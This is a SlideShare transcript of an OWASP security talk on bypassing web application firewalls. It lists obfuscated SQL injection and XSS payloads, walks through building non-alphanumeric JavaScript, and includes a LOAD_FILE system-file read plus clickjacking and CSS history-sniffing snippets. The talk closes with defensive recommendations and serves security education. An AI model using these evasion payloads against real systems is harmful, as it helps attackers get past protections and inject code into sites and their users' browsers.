SlideShare uma empresa Scribd logo

Bypassing Web Application Firewalls

OWASP (Open Web Application Security Project)
OWASP (Open Web Application Security Project)
Tecnologia
1 de 39
Baixar para ler offline
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant          www.nethemba.com             www.nethemba.com      
Nethemba – All About Security  Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)  Core business: All kinds of penetration tests, comprehensive web  application security audits, local system and wifi security audits, security  consulting, forensic analysis, secure VoIP, ultra­secure systems  OWASP activists: Leaders of Slovak/Czech OWASP chapters, co­authors  of the most recognized OWASP Testing Guide v3.0, working on new version   We are the only one in Slovakia/Czech Republic that offer:  Penetration tests and security audits of SAP  Security audit of smart RFID cards  Unique own and sponsored security research in many areas (see  our references – Vulnerabilities in public transport SMS tickets,    cracked the most used Mifare Classic RFID cards)        www.nethemba.com       
What are WAFs?  Emerged from IDS/IPS focused on HTTP  protocol and HTTP related attacks  Usually contain a lot of complex reg­exp rules  to match  Support special features like cookie encryption,  CSRF protection, etc.  Except of free mod_security they are quite  expensive (and often there is no correlation    between the price and their filtering capabilities)         www.nethemba.com       
WAFs implementations  Usually they are deployed in “blacklisting mode”  that is more vulnerable to bypasses and  targeted attacks  Application “context” (type of allowed inputs) is  necessary to know for deploying of more secure  “whitelisting mode”  All WAFs can by bypassed  WAF is just a workaround, but from the security    point of view it can be cost­effective        www.nethemba.com       
WAF filter rules  Directly reflects WAF effectiveness  For most WAF vendors they are closely  guarded secrets – most determined attackers  are able to bypass them without seeing the  actual rules  Open­source WAFs (mod_security, PHPIDS)  have open source rules which is better for  more scrutiny by skilled penetration testers          www.nethemba.com       
Typical WAF bypasses Blocked Attack Undetected modification 'or 1=1-- ' or 2=2-- alert(0) %00alert(0) <script>alert(0)</script> <script type=vbscript>MsgBox(0)</script> ' or ''''='r '/**/OR/**/''''=' <script>alert(0)</script> <img src=”x:x” onerror=”alert(0)”></img> <img src=x:x onerror=alert(0)//></img> <img src=http://url onload=alert(0)//></img> 1 or 1=1 (1)or(1)=(1) eval(name) x=this.name X(0?$:name+1)          www.nethemba.com       
Yes, WAF may be also be vulnerable!  WAF also increases the attack surface of a  target organization  WAF may be the target of and vulnerable to  malicious attacks, e.g. XSS, SQL injection,  denial­of­service attacks, remote code  execution vulnerabilities  These vulnerabilities have been found in all  types of WAF products(!)          www.nethemba.com       
Typical bypass flow  1. Find out which characters / sequences are  allowed by WAFs 2. Make an obfuscated version of your injected  payload 3. Test it and watch for the WAF/application  response 4. If it does not work, modify it and try step 2.          www.nethemba.com       
Javascript obfuscation  Javascript has very powerful features  Javascript payload is used in XSS attacks  It is full of evals, expression closures, generator  expressions, iterators, special characters and  shortcuts  Supports a lot of encodings (unicode –  multibyte characters, hexadecimal, octal,  combination of all of them)   Supports XOR, “Encryption”, Base64        www.nethemba.com       
Non­alphanumeric javascript code  Even if only few characters are allowed it is  possible to construct fully functional code:  _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"") [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({} +"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"") [___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({} +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({} [$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()    ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](­~Á)           www.nethemba.com       
Let's bypass WAF!  Example situation: WAF blocks alpha  characters and numbers (probably not a very  real situation, just proof­of­concept :­)  Allows only few special characters (){}_=[];$”! +<>  Let's generate fully nonalphanumeric javascript  code!           www.nethemba.com       
Possibilities of Javascript language  We can use numbers to obtain a single character  in a string, e.g. index zero for accessing the first  character ­ “abc”[0]  We can use addition (+), subtraction (­),  multiplication (*), division (/), modulus (%),  increment (++), decrement (­­)  We know that mathematical operators perform   automatic numeric conversion and string  operators perform automatic string conversion          www.nethemba.com       
Source of different alphanumeric  characters in Javascript Javascript object / String result error state {}+'' “[object Object]” +[][+[]] “NaN” [][+[]]+[] “undefined” [![]]+[] “false”   [!![]]+[]   “true”      www.nethemba.com       
Shortest Possible Ways to Create  Zero without Using Numbers Characters Result +[] 0 +`'` 0 +”`” 0 -[] 0 -`'` 0 -”`” 0          www.nethemba.com       
Generating numbers  +[] //0  ++[[]][+[]] //1  +!+[] //1  ++[++[[]][+[]]][+[]] //2  !+[]+!+[] //2  ++[++[++[[]][+[]]][+[]]][+[]] //3  !+[]+!+[]+!+[] //3          www.nethemba.com       
Gain alpha characters without  directly using them  When define Javascript object using the object  literal and concatenate with string, the result is  [object Object]  _={}+''; //[object Object]  alert(_[1]) //returns 'o' character          www.nethemba.com       
Generate string “alert” without using  any alphanumeric characters  Let's start with 'a'   What Javascript object contains 'a'?   We can use 'NaN' (Not a Number)  Access empty string with index “0” (undefined)  and convert to number (NaN)   +[][+[]] // result: NaN          www.nethemba.com       
Generating 'a' character  NaN[1]='a'  ++[[]][+[]] //1  +[][+[]]+[] // result string: NaN  (+[][+[]]+[])[++[[]][+[]]] //a  We have character 'a'          www.nethemba.com       
Generating 'l' character  Use boolean false  We can use ! (NOT) operator  e.g. ''==0 //true  Use blank array (string) and then NOT operator  to obtain boolean, wrap with [] and convert it to  string  ([![]]+[]) //string “false”          www.nethemba.com       
Generating 'l' character  ++[++[[]][+[]]][+[]] //2  ([![]]+[]) //string “false”  'false'[2] = ([![]]+[])[++[++[[]][+ []]][+[]]] // 'l'    We have 'l' character!          www.nethemba.com       
Generating 'e' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'  ++[++[++[[]][+[]]][+[]]][+[]] //3  'true'[3] = ([!![]]+[])[++[++[++ [[]][+[]]][+[]]][+[]]] //e  And we have 'e' character!          www.nethemba.com       
Generating 'r' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   ++[[]][+[]] //1  'true'[1] = ([!![]]+[])[++[[]][+ []]] //r  And we have 'r' character!          www.nethemba.com       
Generating 't' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   +[] //0  'true'[0] = ([!![]]+[])[+[]] //t  And we have 't' character!          www.nethemba.com       
And now we have 'alert' string! (+[][+[]]+[])[++[[]][+[]]]+([![]]+ [])[++[++[[]][+[]]][+[]]]+([!![]]+ [])[++[++[++[[]][+[]]][+[]]][+[]]]+ ([!![]]+[])[++[[]][+[]]]+([!![]]+ [])[+[]] //string 'alert'          www.nethemba.com       
How to execute the code of our choice?  It is necessary to return window object to  access all properties of window   If you can access to a constructor, you can  access Function constructor to execute  arbitrary code  The shortest possible way to get window is: alert((1,[].sort)()) // shows  window object !   Works in all browsers except IE        www.nethemba.com       
How to generate 'sort' string   We know how to generate string 'alert'  We need to generate 'sort' string 'false'[3]=([![]]+[])[++[++[++[[]] [+[]]][+[]]][+[]]] //'s'   We can gain 'o' from []+{} [object Object] ([]+{})[++[[]][+[]]] //o  We have already generated 'r' and 't'          www.nethemba.com       
And now we have 'sort' string ([![]]+[])[++[++[++[[]][+[]]][+[]]][+ []]]+([]+{})[++[[]][+[]]]+([!![]]+[]) [++[[]][+[]]]+([!![]]+[])[+[]]  //string 'sort'          www.nethemba.com       
Let's build it together – call alert(1)  (1,[].sort)().alert(1)  After changing number 1 and all alpha  characters to their obfuscated version we get: ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]](++[[]][+[]])    //calls alert(1)!        www.nethemba.com       
How to call any arbitrary  Javascript function  Using the array constructor (accessing the  constructor twice from an array object returns  Function): [].constructor.constructor(“alert(1 )”)()   We need to generate the rest 'c','n','u' letters,  gain them from the output of [].sort function:   function sort() { [native code] }        www.nethemba.com       
SQL obfuscation  What is obfuscation of SQL injection vector?  Different DBMS have different SQL syntax,  most of them support Unicode, Base64, hex,  octal and binary representation, escaping,  hashing algorithms (MD5, SHA­1)  Many “blacklisted” characters can be replaced  by their functional alternatives (0xA0 in MySQL)  Obfuscated comments – it is difficult to    determine what is a comment and what is not        www.nethemba.com       
SQL obfuscation examples  SELECT CONCAT (char  (x'70617373',b'11101110110111101110010011 00100'))  s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1    SELECT  LOAD_FILE(0x633A5C626F6F742E696E69)  (M)   SELECT(extractvalue(0x3C613E61646D696E3   C2F613, 0x2F61))        www.nethemba.com       
New SQL features  MySQL/PostgreSQL supports XML functions: SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');  HTML5 supports local DB storage (SQLite  3.1+) (openDatabase object) – can be misused  for persistent XSS, local SQL injection attacks          www.nethemba.com       
Existing obfuscation tools  Hackvertor http://hackvertor.co.uk/public  HackBar  https://addons.mozilla.org/en­US/firefox/addon/hack  Malzilla http://malzilla.sourceforge.net/  Your imagination :)          www.nethemba.com       
Summary  WAFs are just workarounds!  The best solution is to care about security in every SDLC  phase and strictly validate all inputs and outputs in the  application  Use whitelisting instead of blacklisting (both in the  application and WAF!)  Use multilayer security ­  3rdlayer database architecture or  database firewalls  for SQL use “prepared” statements    for HTML use HTML Purifier or OWASP AntiSamy project        www.nethemba.com       
References  Web Application Obfuscation  http://www.amazon.com/Web­Application­Obfuscati  XSS Attacks: Cross Site Scripting Exploits and  Defense  http://www.amazon.com/XSS­Attacks­Scripting­Exp  Special thanks to Mario Heiderich and Stefano  Di Paola           www.nethemba.com       
UI redressing attacks­ clickjacking <style> iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left 0px; height: 300px; width: 250px; } img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> <img src=”WHAT THE USERS SEES”/> <iframe src=”WHAT THE USER IS ACTUALLY INTERACTING    WITH”></iframe>        www.nethemba.com       
Clickjacking protection  Blocks using X­FRAME/OPTIONS: NEVER  <body> <script> if (top!=self)  document.write('<plaintext>'); </script> ...          www.nethemba.com       
CSS History attack <style> a { position: relative; } a:visited { position: absolute; } </style> <a id=”v” href=”http://www.google.com/”>Google</a> <script>  var l=document.getElementById(“v”); var c=getComputedStyle(l).position; c==”absolute”?alert(“visited”):alert(“not visited”);   </script>        www.nethemba.com       
CSS History exploitation methods  Social network deanonymization attacks  Session ID/CSRF token local brute force attack  LAN scanners  Fixed in Firefox 4.0, current browsers are  vulnerable          www.nethemba.com       

Recomendados

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Balázs Tatár
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Man in the Middle Attack on Banks
Man in the Middle Attack on BanksMan in the Middle Attack on Banks
Man in the Middle Attack on BanksMarko Elezović
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Javascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionJavascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionIban Martinez
 

Recomendados

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Balázs Tatár
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Man in the Middle Attack on Banks
Man in the Middle Attack on BanksMan in the Middle Attack on Banks
Man in the Middle Attack on BanksMarko Elezović
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Javascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionJavascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionIban Martinez
 
Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Damien Seguy
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introductionStijn Van Minnebruggen
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascriptStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Web security
Web securityWeb security
Web securitydavidahaskins
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practicesSultan Khan
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Ajay Khatri
 
Intro to computer vision in .net update
Intro to computer vision in .net updateIntro to computer vision in .net update
Intro to computer vision in .net updateStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)Ajay Khatri
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityHackerOne
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewallsalexmeisel
 

Mais conteúdo relacionado

Mais procurados

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Damien Seguy
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascriptStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practicesSultan Khan
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Ajay Khatri
 
Intro to computer vision in .net update
Intro to computer vision in .net updateIntro to computer vision in .net update
Intro to computer vision in .net updateStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)Ajay Khatri
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 

Mais procurados (20)

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web security
Web securityWeb security
Web security
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practices
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
 
Intro to computer vision in .net update
Intro to computer vision in .net updateIntro to computer vision in .net update
Intro to computer vision in .net update
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 

Destaque

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityHackerOne
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewallsalexmeisel
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityXavier Perseguers
 
Apache mod security 3.1
Apache mod security 3.1Apache mod security 3.1
Apache mod security 3.1Hai Dinh Tuan
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection Abhishek Singh
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeChristian Folini
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewallsEnclaveSecurity
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Sophos Benelux
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Deivid Toledo
 

Destaque (10)

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And Modsecurity
 
Apache mod security 3.1
Apache mod security 3.1Apache mod security 3.1
Apache mod security 3.1
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
WAF in Scale
WAF in ScaleWAF in Scale
WAF in Scale
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 

Semelhante a Bypassing Web Application Firewalls

Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Slides
SlidesSlides
Slidesvti
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Securityamiable_indian
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 

Semelhante a Bypassing Web Application Firewalls (20)

JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Java script obfuscation
Java script obfuscationJava script obfuscation
Java script obfuscation
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Slides
SlidesSlides
Slides
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Security
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Java Script ppt
Java Script pptJava Script ppt
Java Script ppt
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 

Mais de OWASP (Open Web Application Security Project)

Mais de OWASP (Open Web Application Security Project) (16)

Paralelni polisweb
Paralelni poliswebParalelni polisweb
Paralelni polisweb
 
Nethemba - Writing exploits
Nethemba - Writing exploitsNethemba - Writing exploits
Nethemba - Writing exploits
 
Preco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost NethembaPreco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost Nethemba
 
Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Sms ticket-hack4
Sms ticket-hack4Sms ticket-hack4
Sms ticket-hack4
 
Se linux course1
Se linux course1Se linux course1
Se linux course1
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Practical web-attacks2
Practical web-attacks2Practical web-attacks2
Practical web-attacks2
 
